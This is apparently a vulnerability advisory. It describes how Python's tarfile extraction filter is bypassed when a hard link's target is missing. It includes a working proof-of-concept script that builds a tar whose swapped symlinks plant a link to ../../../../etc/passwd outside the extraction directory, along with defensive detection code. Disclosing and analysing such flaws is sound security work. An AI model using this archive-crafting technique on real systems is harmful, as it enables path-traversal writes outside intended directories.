Python's TarFile.extractall() and TarFile.extract() methods accept a filter that can be set to make extraction safer.
A bug in how links are processed allows the filter to be bypassed in some limited cases, so that objects can be created under directories other than their intended location.
The bypass is triggered when a hard link is created that points to a file that does not exist. Whether the file exists can be manipulated by changing a symlink during extraction.
The bypass does not apply to the hard link path validation, but it does affect other validation that may occur, such as excluding file types or changing modes.
Moderate - Should be fixed, but not serious in nature.
In Python, run the following code to create a tar file that demonstrates the vulnerability. When extracted, this tar file creates a symlink that bypasses the symlink destination checking.
    import tarfile

    with tarfile.open("poc-hardlink-bypass.tar", mode="x:") as tar:
        # Create a deep directory structure so the c/escape symlink stays inside the path
        a = tarfile.TarInfo("a/t/t/t/t/t/t/t/t/t/t/dummy")
        a.size = 0
        a.type = tarfile.REGTYPE
        tar.addfile(a)

        # Create a dummy file that creates the b directory (I am lazy)
        b = tarfile.TarInfo("b/dummy")
        b.size = 0
        b.type = tarfile.REGTYPE
        tar.addfile(b)

        # Point "c" to the bottom of the tree in "a"
        ca = tarfile.TarInfo("c")
        ca.type = tarfile.SYMTYPE
        ca.linkname = "a/t/t/t/t/t/t/t/t/t/t"
        tar.addfile(ca)

        # Create a symlink. At this point the link should point to a
        # non-existent location under "a"
        cescape = tarfile.TarInfo("c/escape")
        cescape.type = tarfile.SYMTYPE
        cescape.linkname = "../../../../../../../../etc/passwd"
        tar.addfile(cescape)

        # Move "c" to point to "b". This means "c/escape" no longer exists.
        cb = tarfile.TarInfo("c")
        cb.type = tarfile.SYMTYPE
        cb.linkname = "b"
        tar.addfile(cb)

        # Attempt to create a hard link to "c/escape". Since it doesn't exist it
        # will basically create "cescape" but at "boom". Which means the directory
        # traversal now escapes the destination path.
        boom = tarfile.TarInfo("boom")
        boom.type = tarfile.LNKTYPE
        boom.linkname = "c/escape"
        tar.addfile(boom)
Change into a new directory (e.g. mkdir poc; cd poc) and run the following in Python to extract the tar file created above.
    import tarfile

    tarfile.open("../poc-hardlink-bypass.tar", mode="r").extractall(".", filter="data")
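One way to inspect the result of an extraction is to look for symlinks whose targets resolve outside the extraction directory. The helper below is a hypothetical sketch (find_escaping_symlinks is not part of tarfile), demonstrated on a hand-built directory rather than on the archive itself, since what the extraction produces depends on whether the Python in use has been patched. It assumes a platform where os.symlink is available.

```python
import os
import tempfile


def find_escaping_symlinks(root: str) -> list[tuple[str, str]]:
    """Return (relative path, link text) for symlinks under root that resolve outside it."""
    root_real = os.path.realpath(root)
    escaping = []
    # followlinks=False: symlinked directories are listed but never descended into.
    for dirpath, dirnames, filenames in os.walk(root_real, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            resolved = os.path.realpath(path)
            if os.path.commonpath([root_real, resolved]) != root_real:
                escaping.append((os.path.relpath(path, root_real), os.readlink(path)))
    return sorted(escaping)


with tempfile.TemporaryDirectory() as root:
    # A harmless link that stays inside the directory.
    open(os.path.join(root, "inside.txt"), "w").close()
    os.symlink("inside.txt", os.path.join(root, "ok"))
    # A link shaped like the one the archive tries to plant at "boom".
    os.symlink("../../../../../../../../etc/passwd", os.path.join(root, "boom"))
    found = find_escaping_symlinks(root)
    print(found)
```

To use it against the extraction above, call find_escaping_symlinks(".") from inside the poc directory.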
When extracting a hard link from a tar archive using extractall() or extract(), the method TarFile.makelink() is called.
Before calling os.link() to create a hard link, it checks whether the link target exists by calling os.path.exists().
If the link target does not exist, rather than creating the link target and then creating the hard link to the link target, the link target is fetched using TarFile._find_link_target() and extracted directly using TarFile._extract_member() at the location where the hard link would have been created.
This call to TarFile._extract_member() does not pass through the filter method.
This means that by carefully crafting the link target member in the tar file, an attacker can bypass security controls.
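The control flow described above can be modelled with a small toy simulation. This is not CPython's code: Member, toy_filter and toy_extract_all are invented for illustration, the filter only checks whether a symlink resolves outside the root, and the on_disk set stands in for the real existence check (so the symlink swap is not modelled).

```python
import posixpath
from dataclasses import dataclass


@dataclass(frozen=True)
class Member:
    name: str
    kind: str  # "file", "symlink" or "hardlink"
    linkname: str = ""


def toy_filter(member: Member) -> Member:
    """Stand-in filter: refuse symlinks that resolve outside the extraction root."""
    if member.kind == "symlink":
        base = posixpath.dirname(member.name)
        resolved = posixpath.normpath(posixpath.join(base, member.linkname))
        if resolved == ".." or resolved.startswith(("../", "/")):
            raise ValueError(f"filter rejected {member.name!r}")
    return member


def toy_extract_all(members, on_disk, filter_fn):
    """Return a log of (path, kind, linkname) entries that would be written."""
    written = []
    for index, member in enumerate(members):
        member = filter_fn(member)  # members read from the archive are filtered
        if member.kind != "hardlink":
            written.append((member.name, member.kind, member.linkname))
        elif member.linkname in on_disk:
            written.append((member.name, "hardlink", member.linkname))
        else:
            # Fallback: re-extract the earlier member at the hard link's path.
            # filter_fn is NOT applied to this second extraction.
            target = next(
                (m for m in reversed(members[:index]) if m.name == member.linkname),
                None,
            )
            if target is None:
                raise KeyError(member.linkname)
            written.append((member.name, target.kind, target.linkname))
    return written


members = [
    Member("d1/d2/d3/escape", "symlink", "../../../secret"),  # resolves inside the root
    Member("boom", "hardlink", "d1/d2/d3/escape"),
]
# Pretend the link target is missing on disk when the hard link is processed.
written = toy_extract_all(members, on_disk=set(), filter_fn=toy_filter)
print(written[-1])
```

In this model the symlink passes the filter at its original depth, but the same link text placed at "boom" resolves above the root, and the filter never sees that second placement.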
TarFile._find_link_target() is challenging to reach with a hard link. The search for the link target is restricted to the members that appear before the hard link in the tar file. This means that if extractall() is being used, the link target member must itself be successfully extractable. This is not required if extract() is used.
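The "members that appear before the hard link" restriction can be pictured with the public tarfile API. The sketch below does not call the private TarFile._find_link_target(); find_earlier_member and build_link_archive are hypothetical helpers that mimic the described lookup by scanning backwards from the hard link, on a shortened archive with the same ordering of "c", "c/escape", "c" and "boom" entries.

```python
import io
import tarfile


def build_link_archive() -> bytes:
    """Return an in-memory tar whose last member is a hard link to "c/escape"."""
    entries = [
        ("c", tarfile.SYMTYPE, "a"),
        ("c/escape", tarfile.SYMTYPE, "../target"),
        ("c", tarfile.SYMTYPE, "b"),
        ("boom", tarfile.LNKTYPE, "c/escape"),
    ]
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, kind, linkname in entries:
            info = tarfile.TarInfo(name)
            info.type = kind
            info.linkname = linkname
            tar.addfile(info)
    return buf.getvalue()


def find_earlier_member(members, link):
    """Return the closest member before `link` whose name equals link.linkname."""
    position = next(i for i, m in enumerate(members) if m is link)
    for candidate in reversed(members[:position]):
        if candidate.name == link.linkname:
            return candidate
    return None


with tarfile.open(fileobj=io.BytesIO(build_link_archive()), mode="r") as tar:
    members = tar.getmembers()
    hard_link = members[-1]
    resolved = find_earlier_member(members, hard_link)
    print(resolved.name, resolved.issym(), resolved.linkname)
```

Here the hard link "boom" resolves to the earlier "c/escape" symlink member, which is the member that ends up being extracted at the hard link's location.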
This technique cannot be used to create a hard link outside of the destination path. Hard links depend on TarInfo._link_target being present. However, this attribute is only set in TarFile._get_extract_tarinfo(), which is not called.
Date reported: 2025-05-02
Date fixed:
Date disclosed: 2025-07-31